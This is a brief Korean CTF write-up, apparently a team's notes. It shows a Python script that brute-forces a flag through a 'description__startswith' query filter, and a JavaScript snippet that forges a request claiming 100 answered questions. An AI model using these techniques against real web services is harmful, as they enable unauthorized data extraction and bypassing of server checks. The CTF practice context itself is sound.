Team: 어? 이정훈선배?
import requests
# bruteforce
import string
url = "<http://prob.hspace.io:30007/blacklist/detail/?description__startswith=>"
flag = "HCTF{"
while True:
for i in string.printable:
if i in ['%', '_', '#', '?', '&']:
continue
payload = flag + i
print(payload)
r = requests.get(url + payload)
# response code
if r.status_code == 200:
flag += i
print(flag)
break
else:
break
print(flag)
description__startswith 로 주면 됩니다
기차라서 인터넷이 느려서,, 완전한 플래그 사진은 못내겠습니다
그냥 서버에 보낼 때 지금까지 100번 했다고 위조해서 보내면 플래그를 받을 수 있습니다
async function submitAnswer() {
const userAnswer = parseInt(document.getElementById('answer').value, 10);
try {
const response = await fetch('<http://prob.hctf.icewall.org:5001/answer>', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
q_num: 100,
num1: num1,
num2: num2,
ans: num1 + num2,
})
});
data = await response.json();
if(data.finish){
alert(data.flag);
currentQuestion = 1;
}else if (data.next){
alert("correct");
currentQuestion++;
}else{
alert("wrong");
}
generateQuestion();
} catch (error) {
console.error('error', error);
}
}
https://www.dcode.fr/rsa-cipher
이 사이트를 통해 해독했습니다.
